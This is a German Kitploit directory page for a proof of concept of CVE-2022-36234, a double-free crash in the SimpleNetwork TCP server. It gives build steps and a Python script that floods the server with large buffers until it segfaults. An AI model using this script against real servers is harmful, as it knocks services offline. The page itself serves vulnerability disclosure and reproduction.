Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/halcy0nic/cve-2022-36234
SchwachstellenanalyseExploitationFuzzingPenetrationstestsLernen & BildungBinary-Exploitation
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

Proof of Concept für CVE-2022-36234

Repository anzeigen
21vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung von CVE-2022-36234

Es wurde entdeckt, dass der SimpleNetwork TCP Server im Commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 eine Double-Free-Schwachstelle enthält, die durch präparierte TCP-Pakete ausgenutzt werden kann. Das Auslösen des Double Free ermöglicht es Clients, einen beliebigen SimpleNetwork TCP Server aus der Ferne zum Absturz zu bringen. In anderen Situationen können Double-Free-Schwachstellen zu undefiniertem Verhalten und unter bestimmten Umständen potenziell zur Codeausführung führen.

Reproduktion

Um sicherzustellen, dass Sie die zum Kompilieren der Bibliothek erforderlichen Standard-Build-Werkzeuge haben, installieren Sie die folgenden Pakete (auf den meisten Systemen sind diese bereits installiert):

root@kitploit:~
sudo apt-get install build-essential git

Die Schwachstelle kann reproduziert werden, indem aufeinanderfolgende Anfragen mit einem großen Zeichenpuffer in einem TCP-Paket an den Server gesendet werden. Kompilieren Sie zunächst die Bibliothek 'libSimpleNetwork' und den im Quellcode bereitgestellten Beispielserver:

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

Starten des Beispielservers:

root@kitploit:~
./server 80 1

Speichern Sie das folgende Python3-Proof-of-Concept-Skript in einer Datei (ändern Sie den Host nach Bedarf):

Tool herunterladen
root@kitploit:~
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

Ausführen des Python3-Skripts:

root@kitploit:~
python3 poc.py

Absturzüberprüfung:

Im Erfolgsfall stürzt der Server ab und Sie sehen die folgende Ausgabe der Anwendung:

root@kitploit:~
segmentation fault  ./server 80 1

Referenzen

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234